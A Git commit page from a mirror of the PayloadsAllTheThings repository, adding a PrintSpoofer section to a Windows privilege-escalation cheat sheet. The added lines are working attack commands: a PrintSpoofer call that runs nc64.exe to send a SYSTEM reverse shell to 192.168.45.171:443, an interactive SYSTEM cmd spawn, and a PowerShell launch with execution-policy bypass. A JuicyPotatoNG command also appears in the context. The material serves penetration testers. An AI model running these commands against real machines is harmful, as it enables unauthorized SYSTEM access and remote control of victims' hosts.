ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 10:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #696 from jenaye/PrintSpoofer

Browse Source 
[Add] - Priv esc windows (PrintSpoofer)
This commit is contained in:
Swissky 2023-11-17 12:11:48 +01:00 committed by GitHub
commit bb71d4ad14
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
Methodology and Resources/Windows - Privilege Escalation.md
View File

@ -49,6 +49,7 @@
* [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
* [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver))
* [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw))
* [PrintSpoofer (Printer Bug)](#PrintSpoofer-Printer-Bug)))
* [EoP - Privileged File Write](#eop---privileged-file-write)
* [DiagHub](#diaghub)
* [UsoDLLLoader](#usodllloader)
@ -1264,6 +1265,21 @@ JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juic
```
### PrintSpoofer (Printer Bug)
> this work if SeImpersonatePrivilege is enabled
* Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
```powershell
# run nc -lnvp 443 then :
.\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd"
# without listener
.\PrintSpoofer64.exe -i -c cmd
# Via RPD
.\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass"
```
## EoP - Privileged File Write
### DiagHub